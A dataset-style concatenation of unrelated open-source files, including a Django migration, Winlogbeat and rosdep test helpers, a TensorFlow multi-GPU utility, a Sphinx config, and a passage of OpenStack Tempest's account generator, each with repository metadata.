},
{
"name": "CSS",
"bytes": "169395"
},
{
"name": "JavaScript",
"bytes": "10629452"
},
{
"name": "Python",
"bytes": "1589774"
},
{
"name": "Shell",
"bytes": "4212"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations
import django.db.models.manager
class Migration(migrations.Migration):
dependencies = [
('wallposts', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='reaction',
options={'base_manager_name': 'objects_with_deleted', 'ordering': ('created',), 'verbose_name': 'Reaction', 'verbose_name_plural': 'Reactions'},
),
migrations.AlterModelOptions(
name='wallpost',
options={'base_manager_name': 'objects_with_deleted', 'ordering': ('created',)},
),
migrations.AlterModelManagers(
name='mediawallpost',
managers=[
('objects_with_deleted', django.db.models.manager.Manager()),
('base_objects', django.db.models.manager.Manager()),
],
),
migrations.AlterModelManagers(
name='reaction',
managers=[
('objects', django.db.models.manager.Manager()),
('objects_with_deleted', django.db.models.manager.Manager()),
],
),
migrations.AlterModelManagers(
name='systemwallpost',
managers=[
('objects_with_deleted', django.db.models.manager.Manager()),
('base_objects', django.db.models.manager.Manager()),
],
),
migrations.AlterModelManagers(
name='textwallpost',
managers=[
('objects_with_deleted', django.db.models.manager.Manager()),
('base_objects', django.db.models.manager.Manager()),
],
),
migrations.AlterModelManagers(
name='wallpost',
managers=[
('objects', django.db.models.manager.Manager()),
('objects_with_deleted', django.db.models.manager.Manager()),
],
),
]
|
{
"content_hash": "5caaeccba4bc4a67b8668213c1c14f6b",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 156,
"avg_line_length": 34.666666666666664,
"alnum_prop": 0.5394736842105263,
"repo_name": "onepercentclub/bluebottle",
"id": "80a472b8fa978d9b91c11a751720851b0b8d631e",
"size": "2049",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bluebottle/wallposts/migrations/0002_auto_20161115_1601.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "41694"
},
{
"name": "HTML",
"bytes": "246695"
},
{
"name": "Handlebars",
"bytes": "63"
},
{
"name": "JavaScript",
"bytes": "139123"
},
{
"name": "PHP",
"bytes": "35"
},
{
"name": "PLpgSQL",
"bytes": "1369882"
},
{
"name": "PostScript",
"bytes": "2927"
},
{
"name": "Python",
"bytes": "4983116"
},
{
"name": "Rich Text Format",
"bytes": "39109"
},
{
"name": "SCSS",
"bytes": "99555"
},
{
"name": "Shell",
"bytes": "3068"
},
{
"name": "Smarty",
"bytes": "3814"
}
],
"symlink_target": ""
}
|
import os
import platform
import sys
if sys.platform.startswith("win"):
import win32api
import win32con
import win32evtlog
import win32security
import win32evtlogutil
sys.path.append('../../../libbeat/tests/system')
from beat.beat import TestCase
class BaseTest(TestCase):
@classmethod
def setUpClass(self):
self.beat_name = "winlogbeat"
super(BaseTest, self).setUpClass()
class WriteReadTest(BaseTest):
providerName = "WinlogbeatTestPython"
applicationName = "SystemTest"
otherAppName = "OtherSystemTestApp"
sid = None
sidString = None
api = None
def setUp(self):
super(WriteReadTest, self).setUp()
win32evtlogutil.AddSourceToRegistry(self.applicationName,
"%systemroot%\\system32\\EventCreate.exe",
self.providerName)
win32evtlogutil.AddSourceToRegistry(self.otherAppName,
"%systemroot%\\system32\\EventCreate.exe",
self.providerName)
def tearDown(self):
super(WriteReadTest, self).tearDown()
win32evtlogutil.RemoveSourceFromRegistry(
self.applicationName, self.providerName)
win32evtlogutil.RemoveSourceFromRegistry(
self.otherAppName, self.providerName)
self.clear_event_log()
def clear_event_log(self):
hlog = win32evtlog.OpenEventLog(None, self.providerName)
win32evtlog.ClearEventLog(hlog, None)
win32evtlog.CloseEventLog(hlog)
def write_event_log(self, message, eventID=10, sid=None,
level=None, source=None):
if sid == None:
sid = self.get_sid()
if source == None:
source = self.applicationName
if level == None:
level = win32evtlog.EVENTLOG_INFORMATION_TYPE
win32evtlogutil.ReportEvent(source, eventID,
eventType=level, strings=[message], sid=sid)
def get_sid(self):
if self.sid == None:
ph = win32api.GetCurrentProcess()
th = win32security.OpenProcessToken(ph, win32con.TOKEN_READ)
self.sid = win32security.GetTokenInformation(
th, win32security.TokenUser)[0]
return self.sid
def get_sid_string(self):
if self.sidString == None:
self.sidString = win32security.ConvertSidToStringSid(self.get_sid())
return self.sidString
def read_events(self, config=None, expected_events=1):
if config == None:
config = {
"event_logs": [
{"name": self.providerName, "api": self.api}
]
}
self.render_config_template(**config)
proc = self.start_beat()
self.wait_until(lambda: self.output_has(expected_events))
proc.check_kill_and_wait()
return self.read_output()
def assert_common_fields(self, evt, msg=None, eventID=10, sid=None,
level="Information", extra=None):
assert evt["computer_name"].lower() == platform.node().lower()
assert "record_number" in evt
self.assertDictContainsSubset({
"event_id": eventID,
"level": level,
"log_name": self.providerName,
"source_name": self.applicationName,
"type": self.api,
}, evt)
if msg == None:
assert "message" not in evt
else:
self.assertEquals(evt["message"], msg)
self.assertDictContainsSubset({"event_data.param1": msg}, evt)
if sid == None:
self.assertEquals(evt["user.identifier"], self.get_sid_string())
self.assertEquals(evt["user.name"].lower(),
win32api.GetUserName().lower())
self.assertEquals(evt["user.type"], "User")
assert "user.domain" in evt
else:
self.assertEquals(evt["user.identifier"], sid)
assert "user.name" not in evt
assert "user.type" not in evt
if extra != None:
self.assertDictContainsSubset(extra, evt)
|
{
"content_hash": "ecb41984e99a94c4ff3974418bf359e7",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 86,
"avg_line_length": 33.65873015873016,
"alnum_prop": 0.5772223532185805,
"repo_name": "christiangalsterer/execbeat",
"id": "fe79757f624aa0503500019dcb11606976a7d440",
"size": "4241",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "vendor/github.com/elastic/beats/winlogbeat/tests/system/winlogbeat.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Go",
"bytes": "7422"
},
{
"name": "Makefile",
"bytes": "1184"
},
{
"name": "Shell",
"bytes": "28"
}
],
"symlink_target": ""
}
|
import numpy as N
from traits.api import Range
from traitsui.api import View, VGroup, Item, EnumEditor
from TransformPlugin import TransformPlugin
class Rotator(TransformPlugin):
rotation_angle = Range(0, 3)
view = View(
VGroup(
Item('active'),
Item('rotation_angle', editor=EnumEditor(values={
0: u'0:0°',
1: u'1:90°',
2: u'2:180°',
3: u'3:270°'
})),
label='Rotation',
show_border=True))
def _process(self, frame):
return N.rot90(frame, self.rotation_angle)
|
{
"content_hash": "eea9839af91b018b9ec1ebac2ec3cfd8",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 61,
"avg_line_length": 25.666666666666668,
"alnum_prop": 0.5422077922077922,
"repo_name": "ptomato/Beams",
"id": "5316cf5745480d711ae77ca02902780c0df8e40d",
"size": "634",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "beams/Rotator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "57469"
}
],
"symlink_target": ""
}
|
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../'))
sys.path.insert(0, os.path.abspath('./'))
# General configuration
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.pngmath',
'sphinx.ext.ifconfig',
'oslo.sphinx',
]
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = []
if os.getenv('HUDSON_PUBLISH_DOCS'):
templates_path = ['_ga', '_templates']
else:
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'burrow'
copyright = u'2011-present, OpenStack Foundation'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['burrow.']
# Options for HTML output
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme = '_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = ['.']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'burrowdoc'
# Options for LaTeX output
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass)
# documentclass must be 'howto' or 'manual'.
latex_documents = [
('index', 'Burrow.tex', u'Burrow Documentation', u'OpenStack, Founation',
'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'python': ('http://docs.python.org/', None)}
|
{
"content_hash": "e35467d2f8805d2666cd81b4b41c37c7",
"timestamp": "",
"source": "github",
"line_count": 195,
"max_line_length": 79,
"avg_line_length": 30.994871794871795,
"alnum_prop": 0.7220383851753805,
"repo_name": "emonty/burrow",
"id": "6c2cf03ec47b6fccc3ffaac495d147e2f3dafc89",
"size": "7026",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "doc/source/conf.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "7386"
},
{
"name": "Python",
"bytes": "161175"
}
],
"symlink_target": ""
}
|
import os
import traceback
from mock import Mock, patch
def get_test_dir():
return os.path.abspath(os.path.join(os.path.dirname(__file__), 'gem'))
def test_gem_detect():
from rosdep2.platforms.gem import gem_detect
m = Mock()
# test behavior with empty freeze
m.return_value = ''
val = gem_detect([], exec_fn=m)
assert val == [], val
val = gem_detect(['rdoc'], exec_fn=m)
assert val == [], val
# read list output into mock exec_fn
with open(os.path.join(get_test_dir(), 'list_output'), 'r') as f:
m.return_value = f.read()
val = gem_detect(['rdoc'], exec_fn=m)
assert val == ['rdoc'], val
val = gem_detect(['rdoc', 'fakito', 'rake'], exec_fn=m)
assert val == ['rake', 'rdoc'], val
def test_GemInstaller_get_depends():
# make sure GemInstaller supports depends
from rosdep2.platforms.gem import GemInstaller
installer = GemInstaller()
assert ['foo'] == installer.get_depends(dict(depends=['foo']))
def test_GemInstaller():
from rosdep2 import InstallFailed
from rosdep2.platforms.gem import GemInstaller
@patch('rosdep2.platforms.gem.is_gem_installed')
def test_no_gem(mock_method):
mock_method.return_value = False
try:
installer = GemInstaller()
installer.get_install_command(['whatever'])
assert False, "should have raised"
except InstallFailed: pass
test_no_gem()
@patch('rosdep2.platforms.gem.is_gem_installed')
@patch.object(GemInstaller, 'get_packages_to_install')
def test(mock_method, mock_is_gem_installed):
mock_is_gem_installed.return_value = True
installer = GemInstaller()
mock_method.return_value = []
assert [] == installer.get_install_command(['fake'])
# no interactive option with GEM
mock_method.return_value = ['a', 'b']
expected = [['sudo', '-H', 'gem', 'install', 'a'],
['sudo', '-H', 'gem', 'install', 'b']]
val = installer.get_install_command(['whatever'], interactive=False)
assert val == expected, val
expected = [['sudo', '-H', 'gem', 'install', 'a'],
['sudo', '-H', 'gem', 'install', 'b']]
val = installer.get_install_command(['whatever'], interactive=True)
assert val == expected, val
try:
test()
except AssertionError:
traceback.print_exc()
raise
|
{
"content_hash": "7e0cb303376b8e85591e00a34e7d561e",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 76,
"avg_line_length": 32.733333333333334,
"alnum_prop": 0.5955193482688391,
"repo_name": "sorki/rosdep",
"id": "d9b80798e3492debbc31114f1a16b5ae9f8bc229",
"size": "4171",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "test/test_rosdep_gem.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "516"
},
{
"name": "Python",
"bytes": "395957"
},
{
"name": "Shell",
"bytes": "296"
}
],
"symlink_target": ""
}
|
import multiprocessing as mp
import traceback
from contextlib import contextmanager
import six
import tensorflow as tf
from tfsnippet.utils import (is_tensor_object,
is_tensorflow_version_higher_or_equal)
from .misc import cached
__all__ = ['detect_gpus', 'average_gradients', 'MultiGPU']
@cached
def detect_gpus():
"""
Detect the GPU devices and their interconnection on current machine.
Returns:
list[list[str]]: List of GPU groups, each group is a list of
GPU device names. The GPUs in one group are interconnected.
"""
def worker(q):
# `device_lib` will not release the memory it took,
# so we run it in a sub-process.
try:
from tensorflow.python.client import device_lib
if is_tensorflow_version_higher_or_equal('1.8.0'):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
devices = list(device_lib.list_local_devices(config))
else:
devices = list(device_lib.list_local_devices())
gpus = [
(device.name, device)
for device in devices
if device.device_type == 'GPU'
]
union_set = {i: i for i in range(len(gpus))}
for i, (name, device) in enumerate(gpus):
assert (device.name == '/device:GPU:{}'.format(i))
for link in device.locality.links.link:
if link.device_id != i:
union_set[i] = union_set[link.device_id]
for i in six.iterkeys(union_set):
while union_set[i] != union_set[union_set[i]]:
union_set[i] = union_set[union_set[i]]
root_devices = sorted(set(union_set.values()))
gpu_groups = [[] for _ in range(len(root_devices))]
dev_to_group = {j: i for i, j in enumerate(root_devices)}
for i, (name, device) in enumerate(gpus):
gpu_groups[dev_to_group[union_set[i]]].append(name)
q.put((1, gpu_groups))
except Exception:
q.put((0, traceback.format_exc()))
q = mp.Queue()
p = mp.Process(target=worker, args=(q,))
try:
p.start()
result = q.get()
if result[0] == 1:
return result[1]
else:
raise RuntimeError(
'Failed to retrieve GPU information, the traceback of '
'sub-process is:\n {}'.
format('\n '.join(result[1].split('\n')))
)
finally:
p.terminate()
p.join()
def average_gradients(tower_grads):
"""
Calculate the average gradient for each shared variable across all towers.
Note that this function provides a synchronization point across all towers.
Source:
https://github.com/tensorflow/models/blob/master/tutorials/image/
cifar10/cifar10_multi_gpu_train.py
Args:
tower_grads: List of lists of (gradient, variable) tuples. The outer
list is over individual gradients. The inner list is over the
gradient calculation for each tower.
Returns:
List of pairs of (gradient, variable) where the gradient has been
averaged across all towers.
"""
if len(tower_grads) == 1:
return tower_grads[0]
average_grads = []
for grad_and_vars in zip(*tower_grads):
# Note that each grad_and_vars looks like the following:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = []
for g, _ in grad_and_vars:
# Add 0 dimension to the gradients to represent the tower.
expanded_g = tf.expand_dims(g, 0)
# Append on a 'tower' dimension which we will average over below.
grads.append(expanded_g)
# Average over the 'tower' dimension.
grad = tf.concat(axis=0, values=grads)
grad = tf.reduce_mean(grad, 0)
# Keep in mind that the Variables are redundant because they are shared
# across towers. So .. we will just return the first tower's pointer to
# the Variable.
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
class MultiGPU(object):
"""
Class to help build data-paralleled outputs and training operations.
"""
def __init__(self, disable_prebuild=False):
"""
Construct a :class:`MultiGPU`.
Args:
disable_prebuild: Whether or not to disable pre-build on CPU?
Some operations (e.g., NCHW convolutional kernels) may not be
supported by CPUs for the time being, thus the pre-building on
CPUs might need to be disabled.
"""
gpu_groups = detect_gpus()
if not gpu_groups:
self._main_device = '/device:CPU:0'
elif len(gpu_groups) != 1 and not disable_prebuild:
self._main_device = '/device:CPU:0'
else:
self._main_device = gpu_groups[0][0]
self._disable_prebuild = disable_prebuild
self._gpu_devices = tuple(sum(gpu_groups, []))
self._work_devices = self._gpu_devices \
if self._gpu_devices else [self._main_device]
@property
def disable_prebuild(self):
"""Whether or not to disable pre-build on CPU?"""
return self._disable_prebuild
@property
def main_device(self):
"""
Get the main device name.
Main device is the device for storing variables, and for gathering
losses / gradients during training. It may not be necessary one
of the `work_devices`. Do not run the model computation graph on the
`main_device`, otherwise the `channels_last` parameter for convolutional
layers might result in undesired behaviors.
"""
return self._main_device
@property
def work_devices(self):
"""
Get the names of the working devices.
The model computation graph should be run only on these devices.
Do not run them on the `main_device`, otherwise the `channels_last`
parameter for convolutional layers might result in undesired behaviors.
"""
return self._work_devices
@property
def gpu_devices(self):
"""Get the names of GPU devices."""
return self._gpu_devices
def is_gpu_device(self, device):
"""Check whether or not `device` is a GPU device."""
return device in self._gpu_devices
def channels_last(self, device):
"""
Get the `channels_last` argument for `device`.
It will be :obj:`True` for non-GPU devices, :obj:`False` for GPUs.
Be careful if you want to build a model on both CPU and GPU devices,
with ``channels_last = multi_gpu.channels_last(device)``.
The convolutional layers will work as desired, but the dense layers
after or before a convolutional layer will not work properly, unless
special treatment is taken.
"""
return device not in self._gpu_devices
def data_parallel(self, batch_size, inputs):
"""
Iterate through all devices and build the data-paralleled model.
Args:
batch_size (int or tf.Tensor): The size of each mini-batch.
inputs (Iterable[tf.Tensor]): Input placeholders to be sliced
for data parallelism. The input placeholders will be sliced
through the first dimension.
Yields:
str, bool, tuple[tf.Tensor]: ``(dev, pre_build, inputs)``,
the device name, a flag indicating whether this is a
pre-building pass for creating variables on CPU, and the
tuple of sliced input placeholders.
"""
inputs = list(inputs)
# quick path: only one device, do not slice
if len(self.work_devices) == 1:
assert(self.main_device == self.work_devices[0])
yield self.main_device, False, tuple(inputs)
# slow path: multi-GPUs
else:
# the GPUs are not in the same group, place variables on CPU
if self.main_device not in self.work_devices:
yield self.main_device, True, tuple(inputs)
# build the paralleled computation graph for each device
with tf.name_scope('data_parallel') as ns:
pass # generate a name scope to place our data slicing ops
k = len(self.work_devices)
for i, device in enumerate(self.work_devices):
dev_inputs = []
with tf.name_scope(ns + 'tower_gpu_{}'.format(i)):
for inp in inputs:
slice_len = (batch_size + k - 1) // k
low, high = slice_len * i, slice_len * (i + 1)
dev_inputs.append(inp[low: high])
yield device, False, tuple(dev_inputs)
@contextmanager
def maybe_name_scope(self, device):
"""
Generate a name scope if `device` is not `main_device`.
Args:
device (str): The name of the device.
Yields
The generated name scope, or None.
"""
if device == self.main_device:
yield
elif device not in self._gpu_devices:
with tf.name_scope('tower_cpu') as ns:
yield ns
else:
gpu_id = self._gpu_devices.index(device)
with tf.name_scope('tower_gpu_{}'.format(gpu_id)) as ns:
yield ns
def average_grads(self, grads):
"""
Take the averaged gradients on the main device.
Args:
grads: List of lists of (gradients, variables) pairs.
Returns:
List of pairs of (gradient, variable) where the gradient has been
averaged across all devices.
"""
# quick path: only one device, just return the grads
if len(grads) == 1:
return grads[0]
# slow path: multi-GPUs
else:
with tf.device(self.main_device), tf.name_scope('average_grads'):
return average_gradients(grads)
def apply_grads(self, grads, optimizer, global_step=None,
control_inputs=None):
"""
Apply the gradients.
Args:
grads: List of (gradients, variables) pairs.
optimizer: The TensorFlow optimizer.
global_step: The optional global step counter.
control_inputs: Dependency operations before applying the gradients.
Returns:
The operation of applying gradients.
"""
def mk_op():
return optimizer.apply_gradients(grads, global_step=global_step)
with tf.device(self.main_device), tf.name_scope('apply_grads'):
if control_inputs:
with tf.control_dependencies(control_inputs):
return mk_op()
else:
return mk_op()
def average(self, tensors, batch_size=None):
"""
Take the average of given tensors from different devices.
If `batch_size` is specified, the tensors will be averaged with respect
to the size of data fed to each device.
Args:
tensors (list[list[tf.Tensor]]): List of tensors from each device.
batch_size (None or int or tf.Tensor): The optional batch size.
Returns:
list[tf.Tensor]: The averaged tensors.
"""
# check the arguments and try the fast path: only one tensor
tensors = list(tensors)
if not tensors:
return []
length = len(tensors[0])
if length == 0:
raise ValueError('`tensors` must be list of non-empty Tensor '
'lists.')
for t in tensors[1:]:
if len(t) != length:
raise ValueError('`tensors` must be list of Tensor lists of '
'the same length.')
if length == 1:
return [t[0] for t in tensors]
# do the slow path: average all tensors
with tf.device(self.main_device), tf.name_scope('average_tensors'):
if batch_size is None:
return [tf.reduce_mean(tf.stack(t), axis=0) for t in tensors]
k = len(self.work_devices)
slice_len = (batch_size + k - 1) // k
last_slice_size = batch_size - (k - 1) * slice_len
if is_tensor_object(batch_size):
to_float = tf.to_float
else:
to_float = float
float_batch_size = to_float(batch_size)
weights = tf.stack(
[to_float(slice_len) / float_batch_size] * (k - 1) +
[to_float(last_slice_size) / float_batch_size]
)
return [tf.reduce_sum(tf.stack(t) * weights, axis=0)
for t in tensors]
def concat(self, tensors):
"""
Concat given tensors from different devices.
Args:
tensors (list[list[tf.Tensor]]): List of tensors from each device.
Returns:
list[tf.Tensor]: The concatenated tensors.
"""
# check the arguments and try the fast path: only one tensor
tensors = list(tensors)
if not tensors:
return []
length = len(tensors[0])
if length == 0:
raise ValueError('`tensors` must be list of non-empty Tensor '
'lists.')
for t in tensors[1:]:
if len(t) != length:
raise ValueError('`tensors` must be list of Tensor lists of '
'the same length.')
if length == 1:
return [t[0] for t in tensors]
# do the slow path: concat all tensors
with tf.device(self.main_device), tf.name_scope('average_tensors'):
return [tf.concat(t, axis=0) for t in tensors]
|
{
"content_hash": "13b16ad221d716ca160c27d9092bf913",
"timestamp": "",
"source": "github",
"line_count": 394,
"max_line_length": 80,
"avg_line_length": 35.86294416243655,
"alnum_prop": 0.5630573248407643,
"repo_name": "korepwx/tfsnippet",
"id": "fbb8531255233fb33dfd0df22a07bdb4eabbbbef",
"size": "14130",
"binary": false,
"copies": "1",
"ref": "refs/heads/dependabot/pip/tensorflow-2.5.3",
"path": "tfsnippet/examples/utils/multi_gpu.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "471912"
}
],
"symlink_target": ""
}
|
"""
Utility for creating **accounts.yaml** file for concurrent test runs.
Creates one primary user, one alt user, one swift admin, one stack owner
and one admin (optionally) for each concurrent thread. The utility creates
user for each tenant. The **accounts.yaml** file will be valid and contain
credentials for created users, so each user will be in separate tenant and
have the username, tenant_name, password and roles.
**Usage:** ``tempest-account-generator [-h] [OPTIONS] accounts_file.yaml``.
Positional Arguments
--------------------
**accounts_file.yaml** (Required) Provide an output accounts yaml file. Utility
creates a .yaml file in the directory where the command is ran. The appropriate
name for the file is *accounts.yaml* and it should be placed in *tempest/etc*
directory.
Authentication
--------------
Account generator creates users and tenants so it needs the admin credentials
of your cloud to operate properly. The corresponding info can be given either
through CLI options or environment variables.
You're probably familiar with these, but just to remind::
+----------+------------------+----------------------+
| Param | CLI | Environment Variable |
+----------+------------------+----------------------+
| Username | --os-username | OS_USERNAME |
| Password | --os-password | OS_PASSWORD |
| Tenant | --os-tenant-name | OS_TENANT_NAME |
+----------+------------------+----------------------+
Optional Arguments
------------------
**-h**, **--help** (Optional) Shows help message with the description of
utility and its arguments, and exits.
**c /etc/tempest.conf**, **--config-file /etc/tempest.conf** (Optional) Path to
tempest config file.
**--os-username <auth-user-name>** (Optional) Name used for authentication with
the OpenStack Identity service. Defaults to env[OS_USERNAME]. Note: User should
have permissions to create new user accounts and tenants.
**--os-password <auth-password>** (Optional) Password used for authentication
with the OpenStack Identity service. Defaults to env[OS_PASSWORD].
**--os-tenant-name <auth-tenant-name>** (Optional) Tenant to request
authorization on. Defaults to env[OS_TENANT_NAME].
**--tag TAG** (Optional) Resources tag. Each created resource (user, project)
will have the prefix with the given TAG in its name. Using tag is recommended
for the further using, cleaning resources.
**-r CONCURRENCY**, **--concurrency CONCURRENCY** (Required) Concurrency count
(default: 1). The number of accounts required can be estimated as
CONCURRENCY x 2. Each user provided in *accounts.yaml* file will be in
a different tenant. This is required to provide isolation between test for
running in parallel.
**--with-admin** (Optional) Creates admin for each concurrent group
(default: False).
To see help on specific argument, please do: ``tempest-account-generator
[OPTIONS] <accounts_file.yaml> -h``.
"""
import argparse
import netaddr
import os
from oslo_log import log as logging
import yaml
from tempest import config
from tempest import exceptions as exc
from tempest.services.identity.v2.json import identity_client
from tempest.services.network.json import network_client
import tempest_lib.auth
from tempest_lib.common.utils import data_utils
import tempest_lib.exceptions
LOG = None
CONF = config.CONF
def setup_logging():
global LOG
logging.setup(CONF, __name__)
LOG = logging.getLogger(__name__)
def get_admin_clients(opts):
_creds = tempest_lib.auth.KeystoneV2Credentials(
username=opts.os_username,
password=opts.os_password,
tenant_name=opts.os_tenant_name)
auth_params = {
'disable_ssl_certificate_validation':
CONF.identity.disable_ssl_certificate_validation,
'ca_certs': CONF.identity.ca_certificates_file,
'trace_requests': CONF.debug.trace_requests
}
_auth = tempest_lib.auth.KeystoneV2AuthProvider(
_creds, CONF.identity.uri, **auth_params)
params = {
'disable_ssl_certificate_validation':
CONF.identity.disable_ssl_certificate_validation,
'ca_certs': CONF.identity.ca_certificates_file,
'trace_requests': CONF.debug.trace_requests,
'build_interval': CONF.compute.build_interval,
'build_timeout': CONF.compute.build_timeout
}
identity_admin = identity_client.IdentityClient(
_auth,
CONF.identity.catalog_type,
CONF.identity.region,
endpoint_type='adminURL',
**params
)
network_admin = None
if (CONF.service_available.neutron and
CONF.auth.create_isolated_networks):
network_admin = network_client.NetworkClient(
_auth,
CONF.network.catalog_type,
CONF.network.region or CONF.identity.region,
endpoint_type='adminURL',
**params)
return identity_admin, network_admin
def create_resources(opts, resources):
identity_admin, network_admin = get_admin_clients(opts)
roles = identity_admin.list_roles()
for u in resources['users']:
u['role_ids'] = []
for r in u.get('roles', ()):
try:
role = filter(lambda r_: r_['name'] == r, roles)[0]
except IndexError:
msg = "Role: %s doesn't exist" % r
raise exc.InvalidConfiguration(msg)
u['role_ids'] += [role['id']]
existing = [x['name'] for x in identity_admin.list_tenants()['tenants']]
for tenant in resources['tenants']:
if tenant not in existing:
identity_admin.create_tenant(tenant)
else:
LOG.warn("Tenant '%s' already exists in this environment" % tenant)
LOG.info('Tenants created')
for u in resources['users']:
try:
tenant = identity_admin.get_tenant_by_name(u['tenant'])
except tempest_lib.exceptions.NotFound:
LOG.error("Tenant: %s - not found" % u['tenant'])
continue
while True:
try:
identity_admin.get_user_by_username(tenant['id'], u['name'])
except tempest_lib.exceptions.NotFound:
identity_admin.create_user(
u['name'], u['pass'], tenant['id'],
"%s@%s" % (u['name'], tenant['id']),
enabled=True)
break
else:
LOG.warn("User '%s' already exists in this environment. "
"New name generated" % u['name'])
u['name'] = random_user_name(opts.tag, u['prefix'])
LOG.info('Users created')
if network_admin:
for u in resources['users']:
tenant = identity_admin.get_tenant_by_name(u['tenant'])
network_name, router_name = create_network_resources(network_admin,
tenant['id'],
u['name'])
u['network'] = network_name
u['router'] = router_name
LOG.info('Networks created')
for u in resources['users']:
try:
tenant = identity_admin.get_tenant_by_name(u['tenant'])
except tempest_lib.exceptions.NotFound:
LOG.error("Tenant: %s - not found" % u['tenant'])
continue
try:
user = identity_admin.get_user_by_username(tenant['id'],
u['name'])
except tempest_lib.exceptions.NotFound:
LOG.error("User: %s - not found" % u['user'])
continue
for r in u['role_ids']:
try:
identity_admin.assign_user_role(tenant['id'], user['id'], r)
except tempest_lib.exceptions.Conflict:
# don't care if it's already assigned
pass
LOG.info('Roles assigned')
LOG.info('Resources deployed successfully!')
def create_network_resources(network_admin_client, tenant_id, name):
def _create_network(name):
resp_body = network_admin_client.create_network(
name=name, tenant_id=tenant_id)
return resp_body['network']
def _create_subnet(subnet_name, network_id):
base_cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
for subnet_cidr in base_cidr.subnet(mask_bits):
try:
resp_body = network_admin_client.\
create_subnet(
network_id=network_id, cidr=str(subnet_cidr),
